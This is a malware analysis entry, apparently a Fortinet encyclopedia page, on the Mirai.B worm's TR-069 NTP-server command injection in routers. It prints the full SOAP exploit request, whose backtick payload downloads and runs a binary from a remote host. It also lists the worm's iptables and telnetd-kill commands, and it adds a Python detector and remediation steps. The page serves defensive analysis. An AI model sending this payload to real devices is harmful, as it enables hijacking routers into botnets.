Linux/Mirai.B!worm

Analysis

Linux/Mirai.B!worm is a bot that runs on Linux distributions where BusyBox is available. It particularly targets IoT devices. Its well-known variant, Linux/Mirai.A!worm, caused DDoS attacks against several companies and websites. So far, Linux/Mirai.B!worm is reported to have affected a German operator.

The malware exploits a known vulnerability in the implementation of the TR-069 configuration protocol on some routers and modems. TR-069 is used by operators to remotely manage routers and modems. With TR-069, you can:

  • Get information on the router or modem
  • Run DSL diagnostics
  • Adjust time
  • ...
Concerning time adjustment, it is possible to specify an NTP server to use and synchronize time automatically. Unfortunately, on some routers and modems the implementation passes the supplied NTP server name to a shell without sanitizing it, so the value can contain shell syntax and the device executes it: a command injection that allows code execution.
Linux/Mirai.B!worm exploits this vulnerability by crafting a SetNTPServers request, but instead of providing the name of a valid NTP server it provides a shell command, wrapped in backticks, that downloads a malicious payload from a remote server. For example:
<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
  <SOAP-ENV:Body>
    <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">
      <NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/2;chmod 777 2;./2`</NewNTPServer1>
      <NewNTPServer2></NewNTPServer2>
      <NewNTPServer3></NewNTPServer3>
      <NewNTPServer4></NewNTPServer4>
      <NewNTPServer5></NewNTPServer5>
    </u:SetNTPServers>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
In that case, the malicious sample sets the first NTP server to
`cd /tmp;wget http://l.ocalhost.host/2;chmod 777 2;./2`
Because the value is wrapped in backticks, the device's shell runs it as a command instead of treating it as a server name: it changes to the /tmp directory (typically one of the few writable locations on an embedded device), downloads a file named 2 from a host named l.ocalhost.host (note that this is different from localhost; the name no longer resolves), makes that file executable with chmod 777, and runs it.
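The following Python script is an added example, not code from the original page or from Fortinet: it parses a SetNTPServers request of the form shown above, extracts the NewNTPServer1..5 values, and flags any value that is not a plain hostname or IP address, which is both the check a device should apply before handing the value to anything that resembles a shell and a simple way to detect this exploit in captured traffic. The malicious sample is the request from the page; the benign request (using pool.ntp.org) and the function names are constructed for the example.

```python
import ipaddress
import re
import xml.etree.ElementTree as ET

# Namespaces used by the SOAP request shown on the page.
SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
TIME_NS = "urn:dslforum-org:service:Time:1"

# A legitimate NTP server is a DNS hostname (RFC 1123 labels) or an IP address.
# Anything else (backticks, ';', '$(', spaces, '/') is not a server name.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
    r"(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*\.?$"
)


def is_valid_ntp_server(value: str) -> bool:
    """Allow-list check: an empty slot, an IP address, or a plain hostname."""
    value = value.strip()
    if value == "":
        return True  # unused NewNTPServerN slot
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        pass
    return bool(_HOSTNAME_RE.match(value))


def extract_ntp_servers(soap_body: str) -> list[str]:
    """Return the NewNTPServer1..5 values of a SetNTPServers request, in order."""
    root = ET.fromstring(soap_body)
    body = root.find(f"{{{SOAP_NS}}}Body")
    if body is None:
        return []
    call = body.find(f"{{{TIME_NS}}}SetNTPServers")
    if call is None:
        return []  # some other TR-064/TR-069 action; not our concern here
    # The NewNTPServerN children carry no namespace in the request shown.
    return [child.text or "" for child in call if child.tag.startswith("NewNTPServer")]


def find_injected_ntp_servers(soap_body: str) -> list[str]:
    """Return every NTP server value that does not look like a hostname or IP."""
    return [v for v in extract_ntp_servers(soap_body) if not is_valid_ntp_server(v)]


def _request(server1: str) -> str:
    """Build a SetNTPServers request with a given first server (constructed sample)."""
    return (
        '<?xml version="1.0"?>'
        f'<SOAP-ENV:Envelope xmlns:SOAP-ENV="{SOAP_NS}" '
        'SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
        "<SOAP-ENV:Body>"
        f'<u:SetNTPServers xmlns:u="{TIME_NS}">'
        f"<NewNTPServer1>{server1}</NewNTPServer1>"
        "<NewNTPServer2></NewNTPServer2><NewNTPServer3></NewNTPServer3>"
        "<NewNTPServer4></NewNTPServer4><NewNTPServer5></NewNTPServer5>"
        "</u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>"
    )


# The payload value from the request shown on the page.
MALICIOUS_VALUE = "`cd /tmp;wget http://l.ocalhost.host/2;chmod 777 2;./2`"
MALICIOUS_REQUEST = _request(MALICIOUS_VALUE)
# Constructed benign request: a real-looking NTP hostname.
BENIGN_REQUEST = _request("0.pool.ntp.org")


if __name__ == "__main__":
    for name, req in (("malicious", MALICIOUS_REQUEST), ("benign", BENIGN_REQUEST)):
        bad = find_injected_ntp_servers(req)
        print(f"{name}: {'INJECTION ' + repr(bad) if bad else 'clean'}")
```

A device-side fix is the same check applied before the value is stored or used: reject the request (or the individual slot) when is_valid_ntp_server returns False, and never build a shell command from the value at all. On the detection side, the same parser can run over HTTP POST bodies to TCP port 7547 to spot this family regardless of which download host the backtick command names.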
An infected device does the following:
  • Scan other devices for an open TCP port 7547 (the port used by TR-069). If it is open, attempt to infect the device by posting the SOAP request shown above.
  • Block port 7547 to prevent re-infection (which also locks other bots out of the same hole). This is done with a simple iptables rule:
    busybox iptables -A INPUT -p tcp --destination-port 7547 -j DROP
    
  • Kill the telnet daemon as well, which removes the other common entry point into the device:
    busybox killall -9 telnetd
    

Recommended Action

To cure the device:

  1. Reboot the device. The malware does not persist after a reboot. Note that a rebooted device that still exposes port 7547 to the Internet can be infected again as soon as it is scanned, so filter inbound TCP port 7547 on the WAN side until the firmware is fixed.
  2. Update the device's firmware (if possible) so that it is no longer vulnerable.

Telemetry

Detection Availability

Product | Signature database
FortiClient | Extreme
FortiMail | Extreme
FortiSandbox | Extreme
FortiWeb | Extreme
Web Application Firewall | Extreme
FortiIsolator | Extreme
FortiDeceptor | Extreme
FortiEDR | 

Version Updates

Date | Version | Detail
2019-04-02 | 67.50600 | Sig Updated